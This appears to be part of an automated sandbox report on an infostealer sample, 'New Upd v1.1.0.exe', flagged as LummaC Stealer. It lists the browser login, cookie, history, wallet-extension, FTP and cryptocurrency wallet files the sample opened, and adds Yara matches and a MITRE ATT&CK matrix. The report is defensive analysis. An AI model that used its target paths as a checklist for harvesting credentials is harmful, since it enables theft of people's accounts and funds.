Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\LTKMYBSEYZ	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\QNCYCDFIJJ	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\XZXHAVGRAG	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\NEBFQQYWPS	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\ZBEDCJPBEY	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\ZTGJILHXQB	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\New Upd v1.1.0.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior

Source: Yara match	File source: 00000000.00000003.1888075525.0000000000E1F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1888319727.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1909433351.0000000000DBC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: New Upd v1.1.0.exe PID: 7576, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: New Upd v1.1.0.exe PID: 7576, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
